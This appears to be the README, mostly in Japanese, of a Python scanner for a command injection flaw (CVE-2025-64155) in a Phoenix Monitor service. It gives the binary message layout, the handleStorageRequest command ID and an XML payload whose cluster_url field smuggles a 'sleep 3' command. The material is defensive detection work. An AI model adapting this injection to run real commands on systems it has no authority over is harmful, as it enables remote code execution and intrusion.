
CVE-2025-64155-hunter
Phoenix Monitor サービスにおけるコマンドインジェクションの脆弱性(CVE-2025-64155)を検出するための Python スキャナです。
CVE-2025-64155 は、Phoenix Monitor サービスのコマンドインジェクションの脆弱性であり、handleStorageRequest コマンド(コマンド ID: 1075724911)の cluster_url パラメータを通じてリモートコード実行を可能にします。
この脆弱性は、cluster_url フィールドのユーザー制御入力が適切なサニタイズなしにシェルコマンドに渡される際に発生し、シェルのメタ文字によるコマンドインジェクションを許容します。
このスキャナは、Horizon3AI によるエクスプロイト研究に基づいています。
python3 scanner.py -t <target_ip>
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900
# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v
# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15
# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only
-t, --target: ターゲットの IP アドレスまたはホスト名(必須)-p, --port: Phoenix Monitor サービスのポート(デフォルト: 7900)--timeout: 接続タイムアウト(秒)(デフォルト: 10)-v, --verbose: 詳細出力を有効にする--check-only: サービスにアクセスできるかのみ確認するスキャナは時間ベースの検出方法を使用します:
cluster_url フィールドに sleep 3 を含む悪意のあるペイロードを handleStorageRequest コマンドで送信しますこの方法は安全で非破壊的です。有害なコマンドを実行せず、検出目的で無害な sleep コマンドのみを実行します。
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds
============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds
============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable
スキャナは以下の構造のバイナリメッセージを送信します:
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload
XML ペイロードには、cluster_url フィールドにコマンドインジェクションが含まれています:
<TEST_STORAGE type="elastic">
<cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
...
</TEST_STORAGE>
このツールは、許可されたセキュリティテストおよび研究目的のみで使用してください。このツールは、自分が所有するシステム、またはテストする明示的な許可を得たシステムでのみ使用してください。コンピュータシステムへの不正アクセスは違法です。
MIT ライセンス - 詳細は LICENSE ファイルを参照してください。